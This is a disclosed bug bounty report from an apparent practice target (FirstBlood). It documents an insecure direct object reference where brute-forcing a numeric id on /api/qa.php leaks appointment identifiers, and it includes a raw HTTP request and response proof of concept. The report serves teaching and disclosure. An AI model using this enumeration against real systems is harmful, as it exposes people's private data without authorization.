FirstBlood-#58 — Aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data
This issue was discovered on FirstBlood v1
On 2021-05-09, 0xconft Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi there,
The http://firstbloodhackers.com:49276/api/qa.php can be used to leak user's Appointment data by simply bruteforcing the id parameter of that endpoint. Attacker can validate the correct id by simply grepping response that contain "success" word. I also noticed the aptid start from 56910000 which can be used to makes the bruteforcing process faster
PoC where id 56911356 will return aptid of john smith (294b1ccb-de2f-4685-821a-9e4d26009b44 )
Request
POST /api/qa.php HTTP/1.1
Host: firstbloodhackers.com:49276
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://firstbloodhackers.com:49276
Connection: close
Referer: http://firstbloodhackers.com:49276/yourappointments.php
id=56911356
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:16:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73
/manageappointment.php?success&aptid=294b1ccb-de2f-4685-821a-9e4d26009b44
Best Regards,
0xconft
P2 High
Endpoint: /api/qa.php
Parameter: id
Payload: XXXXXXXX where each X is decimal number
FirstBlood ID: 5
Vulnerability Type: Insecure direct object reference
The endpoint QA.php (to query for an appointment) will allow for integer values to be used when querying for appointments. A bad cause of security through obscurity was attempted.